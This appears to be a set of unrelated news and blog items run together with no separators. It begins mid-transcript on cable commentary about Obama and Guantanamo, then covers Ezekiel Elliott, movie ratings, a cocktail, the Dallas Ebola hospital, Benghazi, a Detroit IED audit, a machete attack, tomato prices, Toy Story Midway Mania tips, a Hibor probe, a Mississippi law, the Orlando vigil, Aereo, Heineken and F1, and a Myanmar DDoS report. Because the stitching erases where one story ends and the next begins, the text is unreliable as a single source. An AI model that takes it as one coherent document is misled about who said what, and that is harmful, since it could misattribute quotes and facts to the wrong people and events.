Yeah, look, there are legitimate, important questions about this, as you know we talked about this yesterday, Chris. I certainly thought the President should have informed the Congress. Now, he's starting to make the case as to why he wasn't able to.
Referring back to a segment from earlier in the show, he added:
Both the intelligence that the two CIA officials you interviewed gave us that perhaps there were threats to his life if this leaked. Also the question of exigent circumstances, maybe he was sick. So there's a legitimate debate there.
The liberal commentator then moved on to attack Republicans:
Then, off to the side, off to the far right side, there's the politics. Everything Barack Obama does, he will be attacked for. President Bush released 520 detainees -- released or transferred to third countries -- 520 detainees from Guantanamo, not a peep from the right. It is true.
Begala concluded:
Look, if Barack Obama cured cancer, the Republicans would attack him for putting oncologists out of work. So you just, it goes with the territory of being Barack Obama. You're going to have some people in the Republican Party who attack anything you do.
Jacobus then jumped in to challenge him:
That's so unfair, Paul. In this case, that's very, very unfair. Bipartisan or non-partisan, I think everybody at first -- the President was hoping they could get a bump from this. I think the American people, Republicans and Democrats would have cheered had this all been on the up and up. It appears it's not. Susan Rice has been put out there a second time saying the same things that aren't quite accurate. She should stay off TV, they should keep her off TV.
After co-host Kate Bolduan questioned, "What's not accurate about what Susan Rice said?" Jacobus continued:
She goes out with the talking points and saying this was all on the up and up. This is a case where this guy served honorably when there was enough evidence to the contrary.
Ezekiel Elliott: Will see more targets as receiver
NEWS UPDATE
Elliott has been lining up in the slot and out wide in the early part of training camp as the Cowboys focus on ways to get him more involved in the passing game, Todd Archer of ESPN.com reports. "Zeke can get more catches this year without him playing more plays," quarterback Dak Prescott said Monday. "I think just his ability with the ball in his hands is valuable to this offense. So in the passing game [if] the defense is giving us soft coverage, get it to him and let him do what's best. As you see, we've kind of given it to him a bunch out here already. And it's just the fact of that's just how the offense is going, that's what the defense is giving us. It's not that we're calling plays extra to give Zeke the ball."
ROTOWIRE FANTASY ANALYSIS
As a rookie, Elliott caught 32 passes on 40 targets in 15 games, but running backs in offensive coordinator Scott Linehan's scheme have often hauled in 50 or more passes in a season, including DeMarco Murray's 57 in his final year with Dallas -- which leaves significant potential for growth in Elliott's receiving numbers in his second NFL campaign. Even if he has to serve a brief suspension to begin the season, the league's defending rushing champ could still find a way to improve on his fantasy value in 2017.
More Ezekiel Elliott News from RotoWire.com
UPDATED: National Association of Theatre Owners chief John Fithian also calls on Hollywood to make fewer R-rated films.
LAS VEGAS -- Following through on a commitment made to Vice President Biden in the wake of the December shooting in Newtown, Conn., the MPAA and the National Association of Theatre Owners are making minor tweaks to the movie-ratings system in order to better inform parents.
Earlier this year, following the Newtown school shooting, NATO president John Fithian and MPAA chairman and CEO Christopher Dodd met with a special task force on gun violence headed by Biden. The two trade groups jointly administer the Classification and Rating Administration (CARA).
The new "Check the Box" campaign will highlight descriptions of why a movie received a certain rating. Also, there will be a tag attached to trailers explaining that the trailer is approved to play with the feature they came to see. The campaign also includes a new PSA as well as a new poster that will be displayed at theaters nationwide.
Fithian also called on Hollywood to make fewer R-rated films.
"It's cool to be Quentin Tarantino and it's fun to make movies that have all those diverse elements," Fithian said at a press briefing following his presentation with Dodd. "But there's a bit of a disconnect between exhibitors and studios as to what works."
Asked whether he thinks the studios he represents make too many violent, R-rated films, Dodd pointed out that less than half of all studio films are rated R. He also said it wasn't his job to be a critic.
"There's a real desire to provide choice, and you don't want to change that," Dodd said.
Dodd and Fithian both heralded the new ratings campaign.
"Throughout its existence, the goal of the rating system has never changed: to inform parents and allow them to make their own decisions, considering their children's sensibilities and unique sensitivities," Dodd said during his keynote address at CinemaCon.
Added Fithian, "These changes make the rating and advertising process more transparent and user-friendly for parents, and we are happy to support that endeavor."
Fithian also noted that the movie industry, along with the music and video game business, has made vast improvements in enforcing their respective ratings systems.
"A few weeks ago, the Federal Trade Commission released a report on its most recent undercover shopper survey, with movie theaters scoring their highest since these surveys began over a decade ago," he said. "More than three in four underage teens were denied access to R-rated movies by ticket-sellers and ushers. This is a marked improvement in enforcement and a sign of the movie theater industry's ongoing commitment to America's parents."
PSA from FilmRatings.com on Vimeo.
After our trip to Cuba, where an overly enthusiastic store salesperson foisted a number of syrupy liqueurs made from Anise, Banana, and Coconut upon our cups, there was a deep distrust and fear of banana liqueurs. So we were a bit confused when we flipped through the pages of Imbibe and found the write-up featuring cocktails with banana liqueur.
But the cocktail names, "I Love Lamp", "Ramble On", and "Daiquiri du Bresil" were catchy. So we looked up the Giffard's liqueur mentioned on K&L's website, where it described the liqueur with the magic words: "restrained in its sweetness."
It was definitely worth whatever money Giffard paid for the advertisement.
We now own a bottle of Giffard's Banana Liqueur - which is still definitely sweet (it's a liqueur after all) but happily not cloying.
Immediately, we set about creating the Daiquiri du Bresil and I Love Lamp. Here we feature the Love Lamp, which was the more successful of the two (we used Wray & Nephew's Overproof in the daiquiri... which was admittedly too aggressive of a selection of a "white rum"). The Love Lamp, developed by Jordan Browre in Mayahuel in New York City, turned out to be a delicious, tiki-like drink with a front palate of smokey tequila.
And ever so slightly, our prejudice against liqueurs is dissipating.
(THE HUFFINGTON POST) - The Dallas hospital where the first Ebola victim in the U.S. was treated is apologizing for the way it has handled the crisis. (THE HUFFINGTON POST) - The Dallas hospital where the first Ebola victim in the U.S. was treated is apologizing for the way it has handled the crisis.
Texas Health Presbyterian Hospital took out a full-page ad in The Dallas Morning News and the Fort Worth Star-Telegram addressing the string of criticism it has received since treating Thomas Eric Duncan.
The 26-year-old is the first known person to contract the virus in the U.S. and since then, two nurses who treated him have contracted the virus.
Nurses at the Texas Health Presbyterian Hospital have criticized the protocol taken ever since Duncan arrived on September 28th.
"Our nurses are not protected. They're not prepared to handle Ebola."
"On his return visit to the hospital...Mr. Duncan was left for several hours not in isolation, in an area where other patients were present...
The nurses raised questions and concerns about the fact that the skin on their neck was exposed. They were told to use medical tape wound around their neck that is not impermeable."
The CEO admits the hospital was not ready for Ebola.
A letter to the community reads, "despite our best intentions and skilled medical teams, we did not live up to the high standards that are the heart of our hospital's history, mission and commitment... Our focus is on the facts, and we are determined to get the answers as soon as we can."
The letter also said the hospital is looking into how and why nurses Nina Pham and Amber Vinson contracted the disease.
Yesterday, on my orders, United States forces captured Mustafa al-Imam in Libya. Because of this successful operation, al-Imam will face justice in the United States for his alleged role in the September 11, 2012 attacks in Benghazi, which resulted in the deaths of Ambassador Christopher Stevens, Glen Doherty, Sean Smith, and Tyrone Woods—four brave Americans who were serving our country.
To the families of these fallen heroes: I want you to know that your loved ones are not forgotten, and they will never be forgotten.
Our memory is deep and our reach is long, and we will not rest in our efforts to find and bring the perpetrators of the heinous attacks in Benghazi to justice.
I want to thank our law enforcement, prosecutors, intelligence community, and military personnel for their extraordinary efforts in gathering evidence, interviewing witnesses, and tracking down fugitives associated with the attack, capturing them, and delivering them to the United States for prosecution.
The United States will continue to support our Libyan partners to ensure that ISIS and other terrorist groups do not use Libya as a safe haven for attacks against United States citizens or interests, Libyans, and others.
Libya's long-term stability and security are linked to its ability to form a unified government and military, and we encourage all Libyans to support the ongoing reconciliation process facilitated by the United Nations and to work together to build a peaceful and stable country.
Story highlights A federal review cites poor judgment for undiscovered IED in Detroit in 2011
A guard is singled out, but the security company, agency also share some responsibility
The device was later detonated harmlessly, but the review says there still was risk for occupants
A federal review cites poor judgment by a security guard who found a bag outside a government building in Detroit last year and stashed it under a desk where it remained for weeks -- with neither the guard nor anyone else in the building aware that it contained a bomb.
The report by the Homeland Security Department's office of inspector general released on Wednesday also said the guard's employer, a contractor, and the federal agency that oversees security at the Patrick V. McNamara Federal Building shared some responsibility as well for the bomb going undetected.
"Although the IED (improvised explosive device) did not explode, it represented a risk to the safety and security of the building and its occupants," the report said.
After the bomb was discovered it was detonated harmlessly by Detroit police. A Michigan man subsequently was charged with placing the device in a canvas bag outside the building.
The canvas bag, containing a small locked Sentry safe, was discovered February 26, 2011, outside the 27-story building that houses the FBI and other offices and remained at the guard desk until it was identified as a threat three weeks later.
During that time, at least two employees X-rayed it in an unsuccessful attempt to determine its contents. One guard shook it in another failed attempt to learn more, and a federal inspector conducted four routine checks of the guard post without discovering that the bag contained an explosive device, according to the report by the inspector general, an independent watchdog.
Rep. Bennie Thompson of Mississippi, the top Democrat on the Republican-led House Homeland Security Committee, asked for the audit to determine whether the guard's actions violated the private security company's contract with the Federal Protective Service (FPS), the government entity that protects federal property.
The assistant inspector general for inspections, Carlton Mann, concluded the contractor, DECO Inc., "committed multiple breaches of its contract" with the Federal Protective Service. But the report found that the shortcomings "were the result of poor judgment by the guard, not systemic problems with DECO."
Company officials had reason to believe the guard, who was not identified, "should have known how to respond to the bag," the report said.
In addition to receiving refresher training just three months before the incident, the guard was a sergeant with the Detroit Police Department. One FPS official asserted that he was one of the best guards in the building, the report said.
But on the day of the incident, the guard "misidentified the bag as found property and never treated it as suspicious, despite not knowing its contents," the report said.
The bag was placed under the security desk in the McNamara building, where other security guards did not consider it suspicious because the space was used to store found property and personal belongings.
The Federal Protective Service "also bears some responsibility for the bag ... remaining in the building for 21 days," the report said. An FPS inspector did not identify the explosive during four inspections, noting each time that the post was "clean and orderly" and "free of unauthorized items."
On March 18, 2011 -- 21 days after the bag's discovery -- two guards grew suspicious and screened it. When they could not identify the contents, they notified an FPS inspector, who determined the bag possibly contained an explosive and took appropriate action, the report said.
Following the incident, DECO fired the guard in question.
"The guard's actions were serious breaches that cannot be compared easily to other breaches by this company or other guard service companies because there is little precedent," the report said.
DECO also fired a guard and a supervisor who X-rayed the bag and incorrectly identified its contents. A second supervisor resigned before being fired, the report said. Numerous others were suspended, given written warnings, or retrained, it said.
Both the Federal Protective Service and DECO told federal auditors they have taken steps to avoid a similar lapse. DECO put in place a plan of corrective action and the FPS is extending DECO's contract in three-month increments. It plans to solicit a new contract for guard services in Michigan.
A white man in camouflage pants holds a machete (via Shutterstock).
According to the Lake County News, a local newspaper in the central-northwest region of California, a white man has been arrested on suspicion of stabbing a black man with a machete in what police believe was a racially-motivated attack.
Anthony Robert Hammond, the Clearlake, California resident arrested in the incident, was reportedly “yelling racial slurs at numerous people” in the parking lot of his apartment complex when he went into his apartment and came back out with a machete.
“As he continued yelling racial slurs at the victim,” the Lake County News reported, “Hammond struck the victim on the shoulder with the machete, causing serious bodily injury.”
The victim, whose identity hasn't been revealed “due to the severity of the crime” was reportedly rushed to the hospital in an ambulance. His current condition has not yet been reported.
After the police were called during the attack, authorities engaged in a multi-hour standoff with Hammond, as they believed he had a firearm as well as the machete used to stab the victim. He was then arrested at the scene.
The Clearlake attack happened three days after two men were killed in Portland, Oregon for standing up to a racist man yelling slurs at two young minority women.
Greenhouse operators in southern Ontario are feeling the squeeze because of a glut of tomatoes on the market this fall, says the chair of the Leamington-based Ontario Greenhouse Vegetable Growers. Don Taylor said Tuesday that ideal growing seasons in Mexico and the United States as well as Ontario has driven down prices by as much as 40 per cent. More than 70 per cent Ontario greenhouse tomatoes are shipped to the U.S.
The greenhouse produce business — tomatoes, peppers and cucumbers — in southern Ontario is worth about $700 million a year, with tomatoes making up about 40 per cent of that. ( Henry Stancu / The Toronto Star )
“It's been painful for sure,” said Taylor, adding the glut especially hurts those just getting into the greenhouse growing business. The greenhouse produce business — tomatoes, peppers and cucumbers — in southern Ontario is worth about $700 million a year, with tomatoes making up about 40 per cent of that. The Ontario growers call it a “perfect storm” of growing conditions this year in most of the competing jurisdictions.
Article Continued Below
“Whereas last year there was freeze and cool weather in the southwest (U.S.) and Florida, this year they had really excellent conditions — Mexico, California, Florida, the Carolinas — and of course we had good growing conditions for greenhouse vegetables,” Taylor said. “There is much more supply than last year and that obviously put pressure on the prices . . . .,” he said. In southern Ontario there are about 2,100 acres under glass and the number continues to grow each year as greenhouse vegetables compete head to head with produce grown in warmer climates. For example, Ontario greenhouse tomatoes are now exported to Florida, turning a tide of trade that existed for decades “We are looking at expansion of markets (elsewhere) . . . and other varieties (of tomatoes) that might have potentially a slightly different market,” Taylor said. “A lot of people don't realize it but greenhouse production has grown to be a fairly major Ontario success story.”
In a related matter, the United States is about to lock horns once again with Mexico over claims that it is dumping cheap tomatoes on the U.S. market. A legal battle was avoided in 1996 when the U.S. Department of Commerce set a minimum price on Mexican tomatoes. But given that that price hasn't changed in 16 years, U.S. growers are once again complaining that the price is too low and are demanding the federal government to open up a anti-dump investigation. “We are following it with interest because it obviously has an affect on us. And it could be a positive affect or could be a negative affect down the road but is really between those two countries right now,” Taylor said.
Read more about:
My favorite ride at Walt Disney World has been Toy Story Midway Mania for quite some time. While I'm not one of those people you hear about that can score over 500,000, I have developed some techniques that have allowed me to score over 300,000 (and get the Bear!). Most of these involve uncovering the secret targets on each screen, but I've also picked up on a few tricks besides that. Hopefully these tips will help you too.
(Note: These tips also apply to Toy Story Midway Mania in Disney California Adventure at Disneyland.)
Sign up for your FREE Disney World Vacation Planning Video
Entering the ride: When I can, I always go to the far side of the vehicle. I've found that more often than not, this gets me on the hen house side of the Hamm and Eggs screen. I get more points when I'm on that side, so I try and sit there. Note – this may not always work, but I have found that 80% of the time I end up on the hen house side if I do this. If you're riding solo, this won't matter.
Pie Throw Practice: I check to make sure I can shoot high and low and left and right, then stop shooting. Save the arm for when it counts. I have sometimes got on a car where the cannon doesn't shoot correctly. When this happens, tell the attendant when you are exiting – they will let you ride again immediately if you want.
Screen 1: Hamm & Eggs
There are two main areas to pay attention to if you want to boost your score: The hen house on the bottom, and the barn on the top. It's much easier to boost your score with the hen house. If I am on the hen house side, I shoot the fox and the hens that come out, while also shooting the two pigs above the fox. When the two pigs go down, a cat appears. Its value keeps increasing until it hits 2000. I keep shooting just these targets over and over (and occasionally hit a beaver or two) and typically score about 30,000 or so. If I'm on the other side, I shoot the creatures in the barn – nail the mice crawling on it and inside and then the barn flips. Suddenly lots of mice worth 2000 appear – shoot as many as you can. Since the mice are somewhat small targets, this is a harder technique than using the hen house, but you can still rack up a good score on this screen if you go for the barn.
Finally got the Bear!
Screen 2: Rex & Trixie
My least favorite screen. This one requires help from your cart-mate to uncover the secret targets. Shoot the volcano lava three times (first 1 lava, then 2, then 3). Shoot the 500 and 1000 target balloons while you are waiting for lava to reappear. After you hit the 3 lava streams, shoot at all the 500 point balloons that spew from the volcano. Then IMMEDIATELY hit the two meteors three times – one on each upper side of the screen. When you get the third hit on each, several balloon meteors come hailing down. In the center of each group is a red balloon – hit it – it's worth 5000 points. My score on this one varies a bit – as low as about 25,000, but I've topped 50,000 when I get the red balloons. If you hit about 40,000, your overall score should be about 70,000 now. I have cleared the meteors when playing solo, but you don't have much time left to get the red balloons when you have to do all the shooting yourself.
Screen 3: Green Army Men
The key here is shortly after the beginning, two 2000 plates will shoot up in the valleys on either side of the center. Hit them both before they disappear and the center mountain turns around to reveal a tank. The tank alternates which side it shoots, but each plate is worth 5000. Additionally, four plates worth 2000 pop up on each side behind the hills. Keep shooting these valuable plates and you can score 60,000 or more, bringing our target score to 130,000 now. Note – it is possible to hit both while playing solo, but this is not easy. I find the plates come up to the outside of the valleys and aim for the one further away from me first. Of course, if you have another player in your cart, you have to share the 5000 plates with them (don't you?).
Screen 4: Buzz Flying Tossers
Two different strategies – the better one is to take out all eight 100 point targets in the spaceship in the center. If you can get all eight down before any pop back up, a large robot appears. Each time it appears you can shoot rings into its mouth and get points. The first time its only worth 100 points, so shoot at other more valuable targets then. The value of shooting inside the robot's mouth goes up to 500, then 1000 and finally 2000. Shoot as many as you can to maximize your score. My target for this screen is 60,000, bringing my overall total now to 190,000. Getting all eight targets down can be done solo, but it's hard. So the alternative strategy is just shot the 500, 1000 and 2000 targets on the sides. Every now and then a 5000 alien appears near the top – shoot it as fast as you can. You can still hit 50,000-60,000 using this strategy.
Screen 5: Woody's Shooting Gallery
Very hard to do this solo. When you hit the 100 point targets, they will “open up” to reveal 5 more targets. Open up all 100 point targets and then hit all the new targets to close them all. You have to do this for each group, as repeating a target won't help here. When you do, all the targets will pop open worth 2000 points each. Hit as many as you can, then as you move to the final screen, shoot the two 500 point targets near the bottom. A 2000 point target will appear. Also, hit the 1000 point targets near them. On the final mine cart screen, hit every cart as it comes out and the last ones will be worth 5000 (miss one and it won't). Also, hit the bat twice (1000 points then 5000 points). When the final target appears hit it fast and often. Eventually it will be worth 2000 points for each hit. Keep your arm loose and you'll shoot faster and it will hurt less. Tensing up the arm is common and it slows you down.
Final tip – have your camera phone ready to record your record score. Take the picture of your score on the cart screen (the main screen is still 3D at this point). And if you're the high score for the cart, the hour, the day or the month, record it to prove your domination of Toy Story Midway Mania!
A group of workers has lunch in Hong Kong on June 16, 2013. (Photo11: Kin Cheung, AP) Story Highlights Hong Kong authorities broaden investigation into possible Hibor misuse
Hibor is the benchmark rate used for loans between banks
Swiss bank UBS previously admitted to the manipulation of Libor, Euribor and Tibor
HONG KONG — Hong Kong has widened an investigation into possible manipulation of the city's benchmark inter-bank lending rate that initially targeted only Swiss banking giant UBS AG.
The Hong Kong Monetary Authority has "commenced follow-up actions on a number of banks to ascertain whether there have been any inappropriate market conducts in their benchmark rate submissions," the authority said Monday.
The monetary authority did not identify the banks added to its probe of submissions for Hibor, the Hong Kong Interbank Offered Rate.
Twenty banks designated by the Hong Kong Association of Banks set the benchmark currency rates, which are used to settle a broad range of contracts. As of September, Hong Kong's banking sector held over HK$2 trillion on balance sheet contracts that referenced Hibor, according to the Treasury Markets Association, a Hong Kong organization that recommends the banks that submit rates for the benchmarks.
The current group of banks includes major Asia financial institutions such as Bank of China (Hong Kong), the Hong Kong and Shanghai Banking Corporation, as well as U.S.-based banks JPMorgan Chase and Citibank and other global banks, including BNP Paribas and the Bank of Tokyo-Mitsubishi.
A November report issued by the Treasury Markets Association said the organization's back-testing of Hibor rates before, during and after the global financial crisis found no suspicious results.
"The Hibor fixing mechanism remains basically sound," the report concluded, adding that there was "no need to change the current definition of Hibor or replace it with (an) alternative benchmark."
However, the report recommended that participating banks be given "clear guidance" on rate-submission protocols and enhanced independence and governance of the Hibor compilation process.
The Hong Kong Monetary Authority in February accepted the recommendations, along with changes proposed by the Hon Kong Association of Banks. The monetary authority said administration of the Hibor fixing process should be transferred to the Treasury Markets Authority within six months. Other changes ordered included a comprehensive code of conduct for bank administrators involved in setting Hibor rates.
The monetary authority, Hong Kong's central bank, had announced a Hibor-related investigation of UBS in December. The probe began just after UBS agreed to pay $1.5 billion to U.S., British and Swiss regulators to settle charges regarding the manipulation of Libor, the London Interbank Offered Rate used as benchmark for loans around the world, including many U.S. mortgages.
UBS previously admitted to the manipulation of Euribor and Tibor, inter-bank rates set in Brussels and Tokyo.
Arthur Yuen, the monetary authority's deputy chief executive for banking, told legislators in April that the ongoing investigation "involved inspection of voluminous internal correspondences among the traders of the bank in order to ascertain whether there had been irregularities and manipulation of the Hibor."
BANKING: Global interest-rate-rigging crackdown escalates
Legislator Dennis Kwok told USA TODAY on Monday that "the HKMA are very much behind other regulatory authorities and central banks around the world. I'm quite disappointed with the speed of this investigation."
News of the broader Hong Kong investigation came three days after the Monetary Authority of Singapore said 133 traders at 20 global banks had attempted to manipulate foreign exchange and interest rate benchmarks there.
The authority, Singapore's central bank, said an investigation found the traders showed "a lack of professional ethics." But the central bank said there was no evidence of any offenses that would be criminal offenses under Singapore laws.
The banks cited included UBS, Royal Bank of Scotland, Bank of America, Citibank, JPMorgan Chase and Dutch bank ING.
HSBC Holdings PLC, the dominant commercial bank in Hong Kong, disclosed a year ago that it was involved in inter-bank rate probes in several countries.
Separately, authorities in the U.S. and U.K. are preparing to bring criminal charges against former employees of London-based Barclays PLC over Libor rate manipulation, according to reports published by The Wall Street Journal and other media outlets.
Barclays, UBS and RBS have paid a total of about $2.5 billion in fines over the past year regarding Libor manipulation. Bob Diamond resigned as chief executive of Barclays as result of the scandal.
McCoy reported from New York
Read or Share this story: http://usat.ly/16aBeiD
Image copyright AP Image caption Critics of the the law said it discriminated against same-sex couples, transgender people and others
A US judge has blocked a Mississippi law protecting religious objections to same-sex marriage a day before it was set to take effect.
It favoured some religious beliefs over others and would mean unequal treatment for gay people, the judge said.
The measure was intended to protect people who objected on religious grounds to gay marriage, extramarital sex and changing gender.
State attorneys are expected to appeal the ruling.
US District Judge Carlton Reeves issued the injunction blocking the law from taking effect on Friday.
Mississippi's "Protecting Freedom of Conscience from Government Discrimination Act" would have allowed those who cite religious beliefs to refuse a broad range of services to lesbian, gay, bisexual and transgender people.
Critics have said the law is so broad it could apply to almost anyone outside of a heterosexual marriage, affecting business practices, adoptions, foster care, school bathroom policies and marriage licences.
"The state has put its thumb on the scale to favour some religious beliefs over others," Judge Reeves wrote, adding that it violated the Constitution's equal protection guarantee.
Media playback is unsupported on your device Media caption Republican Governor Phil Bryant signed the law despite criticism that it discriminates
Republican Mississippi Governor Phil Bryant, who signed the bill into law in April, said he was disappointed at the ruling.
"Like I said when I signed House Bill 1523, the law simply provides religious accommodations granted by many other states and federal law," Bryant said.
"I am disappointed Judge Reeves did not recognise that reality. I look forward to an aggressive appeal."
More than a dozen US states have passed or considered "religious liberty" laws in response to last June's historic Supreme Court decision to legalise gay marriage nationwide.
Central Floridians swarmed to Lake Eola Park and chanted "One Orlando United" and "We Remember" on a night when a rainbow — a symbol of gay pride — appeared in the sky above.
Organizers estimated 50,000 people jammed into the park Sunday during a vigil one week after Orlando was rocked by the deaths of 49 people and the injuries of 53 more on Latin Night at the gay club Pulse. They came to be together and start healing from an event that touched so many.
The vigil Sunday night at Lake Eola was the face of diversity. People there shared their thoughts on why they came. (Kevin Spear/Orlando Sentinel) The vigil Sunday night at Lake Eola was the face of diversity. People there shared their thoughts on why they came. (Kevin Spear/Orlando Sentinel) SEE MORE VIDEOS
"It's not just somebody's son or somebody's daughter," said Enid Nieves-Cruz of Orlando. "It's a coworker. It's a friend of a friend. People's lives have changed."
Nieves-Cruiz said she still was in mourning but looking forward.
"Mourn, but at the same time keep living," she said. "I'm pretty sure that everyone who lost their lives and everybody that's healing in the hospital would want us to. After all, they were out celebrating life."
Mayor Buddy Dyer marveled at the size of the crowd, which packed the park from the water's edge all the way back into the streets on every side.
"Wow, Orlando," Dyer told the throng. "You're showing your love, your compassion, your unity."
Orange County Mayor Teresa Jacobs offered a message of hope and a rallying cry for support for the LGBT community.
"We shared a sorrow this past week that was so profound that at times it felt like healing would be impossible," Jacobs said. "Every person that was lost was the fabric of our community. Each person's life was a beautiful story — a story that was so cruelly and abruptly ended. Each had dreams waiting to come true. Each had aspirations left unfulfilled … To our LGBTQ community, I tell you today that you are not alone. You are not alone in your sorrow and you are not alone in this fight."
Standing near the edge of the water with a good look at the stage, DeLand residents Steve Rader and Jason Gulley saw the Lake Eola vigil as a turning point.
"I think that it is time that we start shifting gears … continue to remember, but hopefully this is the exclamation point of our sadness, and we can move on," Rader said. The couple will be wed in September, he said.
They created bright, rainbow-inspired T-shirts to wear to the vigil. Along with the new Orlando United and Orlando Strong shirts, others wore T-shirts and signs with slogans such as "No hate in our state," "Disarm hate," "One Pulse," "Love is always right" and "We shall overcome."
Thousands turned out for the vigil at Lake Eola on Sunday night for the victims on the Pulse nightclub shootings.
The atmosphere before the ceremony was low key, with people giving away flowers and water, getting their faces painted and carrying flags. A giant rainbow flag toted by about 40 people provided levity as it was held aloft for others to run beneath.
Prior to the vigil, nearby Cathedral Church of St. Luke held a service offering prayers for healing and hope.
"Today I'm wholly inadequate to share any words that would heal this. … This week we have felt forsaken," City Commissioner Robert Stuart said at the service.
He later added that the Bible promises that "even those yet unborn will know God." He said his prayer is that future generations will look back at the Pulse shooting and say, "This is that moment in time in which we decided to make our community better."
To close out the service, the name and age of each victim was read aloud, followed by the tolling of the church bell after each name.
As the names were read, those on hand sat in somber silence. Many bowed their heads, lifting them only to wipe away tears.
"To love takes courage," the Rev. Reggie Kidd said. "May the lives of those who have been taken from us be honored here."
He called for people "to stand in solidarity with LGBT, Latino and Latina members of our community.
"We wish to offer consolation to those who have lost loved ones, comfort to survivors and encouragement and strength to first responders and caregivers."
After the service, many attendings walked the short distance to Lake Eola Park for the vigil.
Irene Lynn and her husband, Rod, arrived at 4 p.m. at Lake Eola, along with their daughter Kristen and her fiancée Delilah Rodriguez. The women plan to get married next year.
"I think this is more than gay rights," Irene Lynn said. "I think there is more love out there than we think there is."
Rod Lynn said he has hope for change.
"Many times it takes a catalyst like this to initiate a more progressive type movement," he said. "No one deserves what happened. This kind of thing needs to stop."
But the grieving process is not over, Irene Lynn said.
"This is the beginning of the beginning," she said.
Kelley Irvin of Winter Park said she hoped the kindness shown in the city since the shooting endures.
"I hope that Orlando continues to show what a kind city it is," Irvin said. "I think that kindness will really heal the city."
dbevil@orlandosentinel.com or 407-420-5477
Broadcast television networks now have two big allies in their fight against Aereo: the National Football League and Major League Baseball. The two sports leagues said Aereo could even cause them to stop airing games on free TV.
TV broadcasters want the Supreme Court to rule on the legality of Aereo, a startup that lets users stream or record live broadcast TV content for $8 a month. The NFL and MLB filed a legal brief to the court in support of the petition last week, as Variety first reported.
The NFL and MLB warned in their brief that if Aereo isn't shut down, they could be forced to air games on cable channels like Disney-owned ESPN or TNT -- instead of the free networks -- "where Aereo-like services cannot hijack and exploit their programming without authorization." (TNT is owned by CNNMoney parent company Time Warner (TWX).)
Twenty-First Century Fox (FOX)made a similar threat in April, saying it would make Fox a pay-TV channel if Aereo stays in business.
Aereo's lack of authorization from broadcasters -- and whether the startup legally needs that approval -- is at the heart of the controversy.
Related story: Aereo CEO: We'll be in 25% of homes in a few years
Aereo houses thousands of tiny antennas in its data centers. It assigns each customer a unique antenna -- which the startup says works just like a DVR and makes Aereo legal. Broadcasters say that's an unfair dodge, and that Aereo should have to pay them to retransmit their programming just like cable and satellite companies do.
The networks -- including ABC parent Disney (DIS), CBS (CBS), Twenty-First Century Fox and Comcast's (CMCSA) NBC Universal -- have filed lawsuits against Aereo in various states since its launch, but the courts have favored Aereo so far. The networks filed a petition to the Supreme Court last month.
The NFL and MLB reiterated the networks' request for the Supreme Court to hear the case, saying that a ruling from the high court would "restore clarity and certainty in this area." The leagues also wrote that Aereo is employing "technological chicanery" to erode the rights of content owners.
NFL games are aired on a variety of networks. CBS and Fox split the majority of games on Sundays, while NBC airs the Sunday-night game. The only two weekly games not aired on a broadcast network are Thursday-night games on the NFL's own network and Monday Night Football on ESPN.
Many baseball games already air on cable channels in local markets. But Fox airs a "game of the week" on Saturdays as well as some playoff games. TNT and fellow Turner network TBS also have broadcast agreements with MLB.
The debate over retransmission fees bubbles up frequently in the TV industry, as it's typically at the crux of battles between cable companies and broadcasters. Time Warner Cable (TWC) yanked CBS from the air for a month in August, and the cable company revealed last month that some of the 306,000 subscribers it lost during that quarter fled due to that blackout.
Heineken's senior global brand director Gianluca Di Tondo says the brand's biggest wish in F1 would be to introduce more Formula 1 races in the Asia-Pacific region and has targeted Vietnam to host a Grand Prix in the future.
Di Tondo has remarked at the early success of the Dutch beer's sponsorship deal with Formula 1 having been announced at the Canadian Grand Prix and enjoying title sponsorship rights of the Italian Grand Prix.
READ: Heineken signs F1 sponsorship deal
Di Tondo has explained Heineken's target audiences entering the F1 market are the US and the Asia-Pacific regions - having already achieved a healthy presence in the European market through its ties with the UEFA Champions League - and would like more Asian races on the calendar in the foreseeable future.
When has if he could add one race to the F1 calendar, Di Tondo responded: "That is very simple - it is again in Asia: Vietnam. We are very present in Vietnam through a local partner and they were our guests in Monza and they were over the moon. So why not have a race in Ho Chi Minh City."
At the start of 2016 Vietnam's first professional race track was opened on the outskirts of Ho Chi Minh City in the Long An Province but it hasn't been built up to meet the requirements of a top grade FIA circuit.
In 2010 an international race circuit was suggested to be built north of Ho Chi Minh City but plans never came to fruition, while Vietnam's strict rules against sports betting have also proven to be a tricky hurdle.
Heineken is also intrigued to see what changes the recent takeover by Liberty Media has on Formula One and eagerly awaits to understand the US company's plans to improve the sport.
"We want to understand how things are going to move and we are having conversations right now with Bernie to see how the situation is going to change if there is a change in ownership," Di Tondo said on formula1.com. "The fact that a media company is joining F1 is very good news. Never forget, we are talking about show business - the entertainment business at its best.
"Anybody who is knowledgeable in the entertainment business is going to be very welcomed because they will probably move away from the corporate set-up of the private suite to be more embracing of the audience out there. And maybe it could also open up the American market, going to places like Las Vegas. That would be fantastic."
Latest Tweets from Crash.net & GPF1rst
Dr Roberts is new FIA F1 Medical Rescue Coordinator
Chief Medical Officer of the British Grand Prix takes on new role within FIA's medical team.
Dr Ian Roberts has been appointed FIA Formula One Medical Rescue Coordinator and will work within the FIA medical team at Grand Prix during the 2013 F1 season. He will report to Professor Jean-Charles Piette, the FIA's permanent Medical Delegate to F1.
While Professor Piette will oversee emergency operations from race control, Dr Roberts will deploy to the track. His primary role there is to supervise the response of the local medical team.
Based in the UK, Dr Roberts is a consultant in anaesthesia and intensive care and a veteran HEMS (Helicopter Emergency Medical Service) practitioner. He is vastly experienced in trackside emergency response and is best known within the motorsports community as the chief medical officer of the Silverstone Circuit. As part of his role at Silverstone he has been chief medical officer of the British Grand Prix for many years. He sits on several motorsports medical advisory panels, including those of the FIA Institute and the UK's Motor Sports Association.
The main Internet provider for Myanmar, the southeast Asian nation formerly known as Burma, has been under severe denial of service attack for some time now, according to the Myanmar Times. A blog post by Arbor Networks goes into technical detail about the attacks.
Image courtesy of Arbor Networks
The Myanmar Times story focuses on the damage done to tourism as the online booking systems are unavailable. All such work must be done over the phone now.
Arbor Networks says that the attack targets the main Internet provider, the Ministry of Post and Telecommunication (or PTT for short). The attacks are well-distributed and Arbor estimates the volume at "...between 10-15 Gbps (several hundred times more than enough to overwhelm the country's 45 Mbps T3 terrestrial and satellite links)."
Arbor links to other stories speculating about the motives behind the attacks.
Hat tip to Threatpost.
